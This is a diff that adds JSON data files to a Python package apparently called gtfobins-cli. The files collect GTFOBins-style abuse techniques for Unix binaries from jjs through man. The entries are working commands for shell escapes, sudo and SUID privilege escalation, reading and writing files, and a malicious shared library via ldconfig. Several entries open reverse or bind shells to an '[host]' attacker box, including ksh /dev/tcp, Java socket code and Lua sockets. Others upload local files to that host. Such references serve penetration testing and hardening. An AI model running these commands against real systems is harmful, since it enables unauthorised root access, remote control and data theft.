gtfobins-cli 1.0.0__py3-none-any.whl

gtfo/data/jjs.json

@@ -0,0 +1,43 @@
+{
+  "description": "This tool is installed starting with Java SE 8.",
+  "functions": {
+    "shell": [
+      {
+        "code": "echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()\" | jjs"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "echo 'var ProcessBuilder = Java.type(\"java.lang.ProcessBuilder\");\nvar p=new ProcessBuilder(\"/bin/bash\", \"-i\").redirectErrorStream(true).start();\nvar Socket = Java.type(\"java.net.Socket\");\nvar s=new Socket(\"[host]\",[port]);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){ while(pi.available()>0)so.write(pi.read()); while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read()); so.flush();po.flush(); Java.type(\"java.lang.Thread\").sleep(50); try {p.exitValue();break;}catch (e){}};p.destroy();s.close();' | jjs\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "echo \"var URL = Java.type('java.net.URL');\nvar ws = new URL('[url]');\nvar Channels = Java.type('java.nio.channels.Channels');\nvar rbc = Channels.newChannel(ws.openStream());\nvar FileOutputStream = Java.type('java.io.FileOutputStream');\nvar fos = new FileOutputStream('[file]');\nfos.getChannel().transferFrom(rbc, 0, Number.MAX_VALUE);\nfos.close();\nrbc.close();\" | jjs\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "echo 'var FileWriter = Java.type(\"java.io.FileWriter\");\nvar fw=new FileWriter(\"[file]\");\nfw.write(\"DATA\");\nfw.close();' | jjs\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "echo 'var BufferedReader = Java.type(\"java.io.BufferedReader\");\nvar FileReader = Java.type(\"java.io.FileReader\");\nvar br = new BufferedReader(new FileReader(\"[file]\"));\nwhile ((line = br.readLine()) != null) { print(line); }' | jjs\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "This has been found working in macOS but failing on Linux systems.",
+        "code": "echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()\" | ./jjs"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "echo \"Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)').waitFor()\" | sudo jjs"
+      }
+    ]
+  }
+}

gtfo/data/join.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "join -a 2 /dev/null [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "join -a 2 /dev/null [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo join -a 2 /dev/null [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/journalctl.json

@@ -0,0 +1,15 @@
+{
+  "description": "This invokes the default pager, which is likely to be 'less', other functions may apply. This might not work if run by unprivileged users depending on the system configuration.",
+  "functions": {
+    "shell": [
+      {
+        "code": "journalctl\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo journalctl\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/jq.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "jq -Rr . [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./jq -Rr . [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo jq -Rr . [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/jrunscript.json

@@ -0,0 +1,43 @@
+{
+  "description": "This tool is installed starting with Java SE 6.",
+  "functions": {
+    "shell": [
+      {
+        "code": "jrunscript -e \"exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')\""
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "jrunscript -e 'var p=new java.lang.ProcessBuilder(\"/bin/bash\", \"-i\").redirectErrorStream(true).start();\nvar s=new java.net.Socket(\"[host]\",[port]);\nvar pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();\nvar po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){\nwhile(pi.available()>0)so.write(pi.read());\nwhile(pe.available()>0)so.write(pe.read());\nwhile(si.available()>0)po.write(si.read());\nso.flush();po.flush();\njava.lang.Thread.sleep(50);\ntry {p.exitValue();break;}catch (e){}};p.destroy();s.close();'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "jrunscript -e \"cp('[url]','[file]')\"\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "jrunscript -e 'var fw=new java.io.FileWriter(\"[file]\"); fw.write(\"DATA\"); fw.close();'"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "jrunscript -e 'br = new BufferedReader(new java.io.FileReader(\"[file]\")); while ((line = br.readLine()) != null) { print(line); }'"
+      }
+    ],
+    "suid": [
+      {
+        "description": "This has been found working in macOS but failing on Linux systems.",
+        "code": "./jrunscript -e \"exec('/bin/sh -pc \\$@|sh\\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)')\""
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo jrunscript -e \"exec('/bin/sh -c \\$@|sh _ echo sh <$(tty) >$(tty) 2>$(tty)')\""
+      }
+    ]
+  }
+}

gtfo/data/ksh.json

@@ -0,0 +1,60 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "ksh"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell.",
+        "code": "ksh -c 'ksh -i > /dev/tcp/[host]/[port] 2>&1 0>&1'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file in the body of an HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "ksh -c 'echo -e \"POST / HTTP/0.9\\n\\n$(cat [file])\" > /dev/tcp/[host]/[port]'\n"
+      },
+      {
+        "description": "Send local file using a TCP connection. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file.",
+        "code": "ksh -c 'cat [file] > /dev/tcp/[host]/[port]'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "ksh -c '{ echo -ne \"GET /[file] HTTP/1.0\\r\\nhost: [host]\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n    3<>/dev/tcp/[host]/[port] \\\n    | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } > [file]'\n"
+      },
+      {
+        "description": "Fetch remote file using a TCP connection. Run 'nc -l -p [port] < [file]' on the attacker box to send the file.",
+        "code": "ksh -c 'cat < /dev/tcp/[host]/[port] > [file]'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "ksh -c 'echo DATA > [file]'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "It trims trailing newlines.",
+        "code": "ksh -c 'echo \"$(<[file])\"'\n"
+      },
+      {
+        "description": "It trims trailing newlines.",
+        "code": "ksh -c $'read -r -d \\x04 < [file]; echo \"$REPLY\"'\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ksh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ksh"
+      }
+    ]
+  }
+}

gtfo/data/ksshell.json

@@ -0,0 +1,20 @@
+{
+  "description": "Each line is corrupted by a prefix string. Also consider that lines are actually parsed as 'kickstart' scripts thus some file contents may lead to unexpected results.\n",
+  "functions": {
+    "file-read": [
+      {
+        "code": "ksshell -i [file]\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ksshell -i [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ksshell -i [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/latex.json

@@ -0,0 +1,29 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "latex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The read file will be part of the output.",
+        "code": "latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}'\nstrings article.dvi\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "The read file will be part of the output.",
+        "code": "sudo latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}'\nstrings article.dvi\n"
+      },
+      {
+        "code": "sudo latex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./latex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n"
+      }
+    ]
+  }
+}

gtfo/data/latexmk.json

@@ -0,0 +1,27 @@
+{
+  "description": "This allows to execute Perl code.",
+  "functions": {
+    "shell": [
+      {
+        "code": "latexmk -e 'exec \"/bin/sh\";'"
+      },
+      {
+        "code": "latexmk -latex='/bin/sh"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "latexmk -e 'open(X,\"[file]\");while(<X>){print $_;}exit'"
+      },
+      {
+        "description": "The read file will be part of the output.",
+        "code": "TF=$(mktemp)\necho '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{[file]}\\end{document}' >$TF\nstrings tmp.dvi\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo latexmk -e 'exec \"/bin/sh\";'"
+      }
+    ]
+  }
+}

gtfo/data/ld.so.json

@@ -0,0 +1,20 @@
+{
+  "description": "'ld.so' is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with:\n```\n$ strings /proc/self/exe | head -1\n/lib64/ld-linux-x86-64.so.2\n```",
+  "functions": {
+    "shell": [
+      {
+        "code": "/lib/ld.so /bin/sh"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./ld.so /bin/sh -p"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo /lib/ld.so /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/ldconfig.json

@@ -0,0 +1,17 @@
+{
+  "description": "Follows a minimal example of how to use the described technique (details may change across different distributions). Run the code associated with the technique. Identify a target SUID executable, for example the 'libcap' library of 'ping':\n\n```\n$ ldd /bin/ping | grep libcap\n      libcap.so.2 => /tmp/tmp.9qfoUyKaGu/libcap.so.2 (0x00007fc7e9797000)\n```\n\nCreate a fake library that spawns a shell at bootstrap:\n\n```\necho '#include <unistd.h>\n\n__attribute__((constructor))\nstatic void init() {\n    execl(\"/bin/sh\", \"/bin/sh\", \"-p\", NULL);\n}\n' >\"$TF/lib.c\"\n```\n\nCompile it with:\n\n```\ngcc -fPIC -shared \"$TF/lib.c\" -o \"$TF/libcap.so.2\"\n```\n\nRun 'ldconfig' again as described below then just run 'ping' to obtain a root shell:\n\n```\n$ ping\n# id\nuid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)\n```",
+  "functions": {
+    "sudo": [
+      {
+        "description": "This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries.",
+        "code": "TF=$(mktemp -d)\necho \"$TF\" > \"$TF/conf\"\n# move malicious libraries in $TF\nsudo ldconfig -f \"$TF/conf\"\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "This allows to override one or more shared libraries. Beware though that it is easy to *break* target and other binaries.",
+        "code": "TF=$(mktemp -d)\necho \"$TF\" > \"$TF/conf\"\n# move malicious libraries in $TF\n./ldconfig -f \"$TF/conf\"\n"
+      }
+    ]
+  }
+}

gtfo/data/less.json

@@ -0,0 +1,40 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "less /etc/profile\n!/bin/sh\n"
+      },
+      {
+        "code": "VISUAL=\"/bin/sh -c '/bin/sh'\" less /etc/profile\nv\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "less [file]"
+      },
+      {
+        "description": "This is useful when 'less' is used as a pager by another binary to read a different file.",
+        "code": "less /etc/profile\n:e [file]\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "echo DATA | less\n[file]\nq\n"
+      },
+      {
+        "description": "This invokes the default editor to edit the file. The file must exist.",
+        "code": "less [file]\nv\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo less /etc/profile\n!/bin/sh\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./less [file]"
+      }
+    ]
+  }
+}

gtfo/data/logsave.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "logsave /dev/null /bin/sh -i"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo logsave /dev/null /bin/sh -i"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./logsave /dev/null /bin/sh -i -p"
+      }
+    ]
+  }
+}

gtfo/data/look.json

@@ -0,0 +1,19 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "look '' \"[file]\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./look '' \"[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo look '' \"[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/ltrace.json

@@ -0,0 +1,26 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "description": "The file is parsed as a configuration file and its content is shown as error messages, thus this is not suitable to exfiltrate binary files.",
+        "code": "ltrace -F [file] /dev/null\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "The data to be written appears amid the library function call log, quoted and with special characters escaped in octal notation. The string representation will be truncated, pick a value big enough. More generally, any binary that executes whatever library function call passing arbitrary data can be used in place of 'ltrace -F [data]'.",
+        "code": "ltrace -s 999 -o [file] ltrace -F [data]\n"
+      }
+    ],
+    "shell": [
+      {
+        "code": "ltrace -b -L /bin/sh"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo ltrace -b -L /bin/sh"
+      }
+    ]
+  }
+}

gtfo/data/lua.json

@@ -0,0 +1,58 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "code": "lua -e 'os.execute(\"/bin/sh\")'"
+      }
+    ],
+    "non-interactive-reverse-shell": [
+      {
+        "description": "Run 'nc -l -p [port]' on the attacker box to receive the shell. This requires 'lua-socket' installed.",
+        "code": "lua -e 'local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  while true do\n    local r,x=t:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));t:send(b);\n  end;\n  f:close();t:close();'\n"
+      }
+    ],
+    "non-interactive-bind-shell": [
+      {
+        "description": "Run 'nc [host] [port]' on the attacker box to connect to the shell. This requires 'lua-socket' installed.",
+        "code": "lua -e 'local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  while true do\n    local r,x=c:receive();local f=assert(io.popen(r,\"r\"));\n    local b=assert(f:read(\"*a\"));c:send(b);\n  end;c:close();f:close();'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send a local file via TCP. Run 'nc -l -p [port] > [file]' on the attacker box to collect the file. This requires 'lua-socket' installed.",
+        "code": "lua -e '\n  local f=io.open(\"[file]\", 'rb')\n  local d=f:read(\"*a\")\n  io.close(f);\n  local s=require(\"socket\");\n  local t=assert(s.tcp());\n  t:connect(\"[host]\",[port]);\n  t:send(d);\n  t:close();'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via TCP. Run 'nc [host] [port] < [file]' on the attacker box to send the file. This requires 'lua-socket' to be installed.",
+        "code": "lua -e 'local k=require(\"socket\");\n  local s=assert(k.bind(\"*\",[port]));\n  local c=s:accept();\n  local d,x=c:receive(\"*a\");\n  c:close();\n  local f=io.open(\"[file]\", \"wb\");\n  f:write(d);\n  io.close(f);'\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "lua -e 'local f=io.open(\"[file]\", \"wb\"); f:write(\"DATA\"); io.close(f);'"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "lua -e 'local f=io.open(\"[file]\", \"rb\"); print(f:read(\"*a\")); io.close(f);'"
+      }
+    ],
+      "suid": [
+      {
+        "code": "lua -e 'local f=io.open(\"[file]\", \"rb\"); print(f:read(\"*a\")); io.close(f);'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo lua -e 'os.execute(\"/bin/sh\")'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./lua -e 'os.execute(\"/bin/sh\")'"
+      }
+    ]
+  }
+}

gtfo/data/lualatex.json

@@ -0,0 +1,20 @@
+{
+  "description": "This allows to execute Lua code.",
+  "functions": {
+    "shell": [
+      {
+        "code": "lualatex -shell-escape '\\documentclass{article}\\begin{document}\\directlua{os.execute(\"/bin/sh\")}\\end{document}'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo lualatex -shell-escape '\\documentclass{article}\\begin{document}\\directlua{os.execute(\"/bin/sh\")}\\end{document}'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./lualatex -shell-escape '\\documentclass{article}\\begin{document}\\directlua{os.execute(\"/bin/sh\")}\\end{document}'"
+      }
+    ]
+  }
+}

gtfo/data/luatex.json

@@ -0,0 +1,20 @@
+{
+  "description": "This allows to execute Lua code.",
+  "functions": {
+    "shell": [
+      {
+        "code": "luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
+      }
+    ],
+    "limited-suid": [
+      {
+        "code": "./luatex -shell-escape '\\directlua{os.execute(\"/bin/sh\")}\\end'"
+      }
+    ]
+  }
+}

gtfo/data/lwp-download.json

@@ -0,0 +1,26 @@
+{
+  "description": "Fetch a remote file via HTTP GET request.",
+  "functions": {
+    "file-download": [
+      {
+        "code": "lwp-download [url] [file]\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo lwp-download [url] [file]\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "The file path must be absolute.",
+        "code": "TF=$(mktemp)\nlwp-download \"file://[file]\" $TF\ncat $TF\n"
+      }
+    ],
+    "file-write": [
+      {
+        "code": "TF=$(mktemp)\necho [data] >$TF\nlwp-download file://$TF [file]\n"
+      }
+    ]
+  }
+}

gtfo/data/lwp-request.json

@@ -0,0 +1,14 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        "code": "lwp-request \"file://[file]\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo lwp-request \"file://[file]\"\n"
+      }
+    ]
+  }
+}

gtfo/data/mail.json

@@ -0,0 +1,20 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "GNU version only.",
+        "code": "mail --exec='!/bin/sh'"
+      },
+      {
+        "description": "This creates a valid Mbox file which may be required by the binary.",
+        "code": "TF=$(mktemp)\necho \"From nobody@localhost $(date)\" > $TF\nmail -f $TF\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "GNU version only.",
+        "code": "sudo mail --exec='!/bin/sh'"
+      }
+    ]
+  }
+}

gtfo/data/make.json

@@ -0,0 +1,26 @@
+{
+  "description": "All these examples only work with GNU 'make' due to the lack of support of the '--eval' flag. The same can be achieved by using a proper 'Makefile' or by passing the content via stdin using '-f -'.",
+  "functions": {
+    "shell": [
+      {
+        "code": "make -s --eval=$'x:\\n\\t-'\"/bin/sh\"\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "Requires a newer GNU 'make' version.",
+        "code": "make -s --eval=\"\\$(file >[file],DATA)\" .\n"
+      }
+    ],
+    "suid": [
+      {
+        "code": "./make -s --eval=$'x:\\n\\t-'\"/bin/sh -p\"\n"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo make -s --eval=$'x:\\n\\t-'\"/bin/sh\"\n"
+      }
+    ]
+  }
+}

gtfo/data/man.json

@@ -0,0 +1,24 @@
+{
+  "description": "This invokes the default pager, which is likely to be  'less', other functions may apply.",
+  "functions": {
+    "shell": [
+      {
+        "code": "man man\n!/bin/sh\n"
+      },
+      {
+        "description": "This only works for GNU 'man' and requires GNU 'troff' to be installed.",
+        "code": "man '-H/bin/sh #' man\n"
+      }
+    ],
+    "file-read": [
+      {
+        "code": "man [file]"
+      }
+    ],
+    "sudo": [
+      {
+        "code": "sudo man man\n!/bin/sh\n"
+      }
+    ]
+  }
+}